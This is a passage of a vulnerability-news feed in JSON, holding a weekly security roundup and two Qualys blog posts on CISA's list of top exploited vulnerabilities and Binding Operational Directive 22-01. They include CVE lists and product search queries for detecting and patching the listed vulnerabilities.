intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." \nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). "A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere were some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). \n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. \n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}